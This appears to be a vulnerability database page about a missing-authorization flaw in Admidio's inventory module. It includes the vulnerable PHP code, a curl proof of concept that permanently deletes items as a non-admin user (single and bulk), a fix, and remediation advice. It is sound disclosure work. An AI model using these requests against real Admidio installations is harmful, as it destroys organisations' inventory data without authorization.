Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Lifecycle Timeline
4DescriptionGitHub Advisory
Summary
The Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data.
Details
The inventory module applies a module-level access control check at modules/inventory.php:65-72 that determines whether a user can access the inventory module at all, based on the inventory_module_enabled setting. In the default configuration (value 2), any logged-in user passes this check.
The item_delete handler at lines 381-397 only validates the CSRF token:
// modules/inventory.php:381-397
case 'item_delete':
// check the CSRF token of the form against the session token
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
if (count($getItemUUIDs) > 0) {
foreach ($getItemUUIDs as $itemUuid) {
$itemService = new ItemService($gDb, $itemUuid);
$itemService->delete();
}
echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_SELECTION_DELETED')));
} else {
$itemService = new ItemService($gDb, $getiniUUID);
$itemService->delete();
echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_ITEM_DELETED')));
}
break;There is no call to $gCurrentUser->isAdministratorInventory() before executing the deletion. The service layer (ItemService::delete() at src/Inventory/Service/ItemService.php:86-92) and the data layer (ItemsData::deleteItem() at src/Inventory/ValueObjects/ItemsData.php:1078-1095) also contain no authorization checks - they directly execute DELETE FROM SQL statements on the item data, borrow data, and item tables.
Meanwhile, the UI does check admin status before showing delete buttons:
// modules/inventory.php:306-309 (UI only)
if ($gCurrentUser->isAdministratorInventory()) {
$msg .= '<button id="adm_button_delete" ...>';
}This creates a false sense of security - the button is hidden, but the endpoint is fully accessible. Item UUIDs needed for the attack are visible to all users who can view the inventory list.
The same missing-authorization pattern affects:
item_retire(line 347) - soft-retires items without admin checkitem_reinstate(line 364) - reinstates retired items without admin checkitem_picture_upload(line 428) - uploads pictures without admin checkitem_picture_save(line 445) - saves pictures without admin checkitem_picture_delete(line 457) - deletes pictures without admin check
PoC
Prerequisites: An Admidio instance with the inventory module enabled (default setting inventory_module_enabled=2), two user accounts - one admin who created inventory items, and one regular user with no inventory admin rights.
# Step 1: Log in as a regular (non-admin) user and get session cookie + CSRF token
# The CSRF token is embedded in any page the user can access
curl -c cookies.txt -b cookies.txt 'https://target/adm_program/modules/inventory.php?mode=item_list'
# Step 2: Extract a target item UUID from the inventory list page
# Item UUIDs are visible in the list view HTML to all users with module access
# Step 3: Permanently delete the item (as a non-admin user)
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuid=TARGET-ITEM-UUID' \
-H 'Cookie: PHPSESSID=regular_user_session' \
-d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'
# Expected response: {"status":"success","message":"Item deleted"}
# The item and all associated data (item fields, borrow records) are permanently deleted.
# Step 4: Bulk deletion is also possible
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuids[]=UUID1&item_uuids[]=UUID2&item_uuids[]=UUID3' \
-H 'Cookie: PHPSESSID=regular_user_session' \
-d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'Impact
- Data destruction: Any authenticated user can permanently delete any inventory item, including all associated field data and borrow records. There is no soft-delete or recycle bin - the SQL
DELETE FROMstatements are irreversible without database backups. - Bulk deletion: The endpoint accepts multiple item UUIDs, allowing an attacker to delete all inventory items in a single request.
- Additional unauthorized operations: The same pattern allows non-admin users to retire/reinstate items and upload/modify/delete item pictures, undermining the entire inventory permission model.
- Blast radius: In organizations using Admidio's inventory module to track physical assets, a disgruntled member or compromised low-privilege account could wipe the entire inventory database.
Recommended Fix
Add isAdministratorInventory() checks to all destructive inventory endpoints. The fix should be applied at the handler level in modules/inventory.php before any service calls:
// modules/inventory.php - Add authorization check to item_delete
case 'item_delete':
// check the CSRF token of the form against the session token
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
// ADD THIS: check if user has admin rights for inventory
if (!$gCurrentUser->isAdministratorInventory()) {
throw new Exception('SYS_NO_RIGHTS');
}
if (count($getItemUUIDs) > 0) {
// ... existing codeApply the same pattern to item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete. Additionally, consider adding authorization checks in ItemService methods as defense-in-depth.
AnalysisAI
Admidio inventory module allows any authenticated user to permanently delete inventory items and modify associated data by bypassing authorization checks present only in the UI layer. The backend handlers for item_delete, item_retire, item_reinstate, and picture operations validate CSRF tokens but never verify the requesting user is an inventory administrator, enabling destructive operations on any item visible to the user. This affects Admidio versions through 5.0.8, and no active exploitation has been reported at the time of analysis.
Technical ContextAI
Admidio's inventory module implements a two-layer access control model: a module-level check (modules/inventory.php:65-72) that permits any logged-in user to access the inventory interface when inventory_module_enabled=2 (default), and a UI-layer authorization check (modules/inventory.php:306-309) that conditionally renders delete buttons only for users passing isAdministratorInventory(). However, the backend POST handlers (item_delete at lines 381-397, item_retire at line 347, item_reinstate at line 364, item_picture_upload/save/delete at lines 428-457) lack authorization checks entirely. These handlers directly instantiate ItemService and call delete()/retire()/reinstate() methods without verifying admin rights, and the service layer (ItemService::delete() in src/Inventory/Service/ItemService.php:86-92) and data layer (ItemsData::deleteItem() in src/Inventory/ValueObjects/ItemsData.php:1078-1095) perform no authorization validation before executing DELETE FROM SQL statements. The vulnerability stems from a missing access control check (CWE-862) where the authorization logic is implemented only in presentation logic, not in the authorization-critical business logic layer.
RemediationAI
Vendor-released patch: Admidio 5.0.9 or later. Update immediately via composer update or by downloading the patched release from https://github.com/Admidio/admidio/releases/tag/v5.0.9. The patch adds isAdministratorInventory() authorization checks to all destructive inventory endpoints (item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, item_picture_delete) before service-layer method calls. For organizations unable to patch immediately, restrict module-level access by setting inventory_module_enabled to a more restrictive value (0 or 1 instead of the default 2), which will prevent non-privileged users from accessing the inventory module entirely. Alternative compensating control: Disable inventory module functionality at the application configuration level (set inventory_module_enabled=0) until patch deployment is feasible, accepting the loss of inventory functionality. Use database-level access controls and automated backup systems to mitigate data loss risk-ensure inventory database is backed up at least daily and test restore procedures. Monitor inventory tables for unexpected DELETE operations and track all user actions via application audit logs (if available) to detect unauthorized deletions retroactively.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-862 – Missing Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-28268
GHSA-xqv4-xm7h-52cv